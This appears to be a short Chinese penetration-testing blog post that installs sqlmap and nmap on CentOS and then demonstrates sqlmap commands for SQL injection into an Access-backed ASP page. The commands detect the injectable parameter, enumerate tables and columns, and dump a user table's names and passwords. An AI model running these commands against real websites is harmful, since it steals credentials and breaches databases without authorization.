A-A+

CentOS下安装sqlmap和nmap Access简单注入之sqlmap

2017年09月23日 渗透测试 暂无评论 阅读 672 次

sqlmap是一个功能很强大的渗透测试工具,而且源码开放,支持的数据库:MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite等等

1.安装python 环境:yum install python -y 

2、sqlmap 的安装比较简单,主要是把源码下载下来就可以了,安装到指定目录为/usr/src/

安装命令:git clone https://github.com/sqlmapproject/sqlmap.git  /usr/src/ 

 

安装nmap:git clone https://github.com/nmap/nmap.git /usr/src/ 

cd nmap

./configure

make

make install

make clean

 

简单演示一下关于sqlmap下注入:

注入漏洞地址:http://www.example.com/showannounce.asp?id=104

./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104"  【Kali下使用:sqlmap -u "http://jgkd.xxx.com/announceshow.asp?id=203"】

./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --tables

./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --columns -T user

./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --dump -T user -C "name,psw"

中间会提示让你输入线程,输入大概5到10个线程这个样子。上面的user,psw这些视情况而定,灵活应用。还有如果不熟悉bt5或没有linux环境的,用啊D,明小子、穿山甲等去跑也可以,前提是你字典够强大!

标签:

给我留言

您必须 登录 才能发表留言!

Copyright © DEFCON笔记 保留所有权利.   青ICP备15000093号-1   

用户登录

分享到: